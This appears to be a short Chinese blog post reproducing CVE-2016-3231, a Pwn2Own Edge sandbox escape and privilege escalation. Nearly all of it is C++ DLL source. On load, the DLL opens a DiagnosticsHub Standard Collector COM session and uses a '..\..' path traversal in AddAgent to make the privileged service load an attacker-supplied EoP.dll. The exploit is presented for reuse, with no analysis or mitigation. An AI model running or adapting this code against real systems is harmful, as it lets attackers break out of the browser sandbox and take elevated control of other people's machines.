CVE-2016-3231

摘要：重现了下韩国小哥Lokihardt在pwn2own上的过沙箱提权漏洞。

 1 #include <windows.h>
 2 #include <atlbase.h>
 3 #include "DiagnosticsHub.StandardCollector.Runtime_h.h"
 4 
 5 BOOL APIENTRY DllMain(HANDLE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved)
 6 {
 7     switch (ul_reason_for_call)
 8     {
 9     case DLL_PROCESS_ATTACH:
10         {
11             WCHAR user_name[MAX_PATH] = { 0 };
12             DWORD name_size = sizeof(user_name);
13             GetUserName(user_name, &name_size);
14 
15             CoInitialize(0);
16 
17             HRESULT hr;
18             CLSID clsid_hub;
19             IID iid_IStandardCollectorService;
20             IStandardCollectorService * i_StandardCollectorService;
21 
22             CLSIDFromString(L"{42CBFAA7-A4A7-47BB-B422-BD10E9D02700}", &clsid_hub);
23             CLSIDFromString(L"{0D8AF6B7-EFD5-4F6D-A834-314740AB8CAA}", &iid_IStandardCollectorService);
24 
25             hr = CoCreateInstance(clsid_hub, NULL, CLSCTX_LOCAL_SERVER, iid_IStandardCollectorService, (LPVOID*)&i_StandardCollectorService);
26             if (FAILED(hr))
27             {
28                 printf("CoCreateInstance failed: %08x
", hr);
29             }
30 
31             SessionConfiguration session_config;
32             ICollectionSession * i_CollectionSession = { 0 };
33             WCHAR scratch_path[MAX_PATH] = { 0 };
34 
35             wsprintf(scratch_path, L"C:\Users\%ws\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\Temp", user_name);
36             session_config.Type = CollectionType_Etw;
37             session_config.Location = CollectionLocation_Local;
38             session_config.Flags = SessionConfigurationFlags_None;
39             session_config.LifetimeMonitorProcessId = 0;
40             session_config.SessionId = {};
41             session_config.CollectorScratch = CComBSTR(scratch_path);
42             session_config.ClientLocale = 0;
43 
44             hr = i_StandardCollectorService->CreateSession(&session_config, nullptr, &i_CollectionSession);
45             if (FAILED(hr))
46             {
47                 printf("CreateSession failed: %08x
", hr);
48             }
49 
50             WCHAR dll_path[MAX_PATH] = { 0 };
51             GUID guid = GUID_NULL;
52 
53             //wsprintf(dll_path, L"..\..\..\..\Users\%ws\AppData\Local\Packages\windows_ie_ac_001\AC\Temp\EoP.dll", user_name); 
54             wsprintf(dll_path, L"..\..\..\..\Users\%ws\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\Temp\EoP.dll", user_name);
55             hr = i_CollectionSession->AddAgent(dll_path, &guid);
56             if (FAILED(hr))
57             {
58                 printf("AddAgent failed: %08x
", hr);
59             }
60 
61             break;
62         }
63     case DLL_THREAD_ATTACH:
64         break;
65     case DLL_THREAD_DETACH:
66         break;
67     case DLL_PROCESS_DETACH:
68         break;
69     }
70 
71     return TRUE;
72 }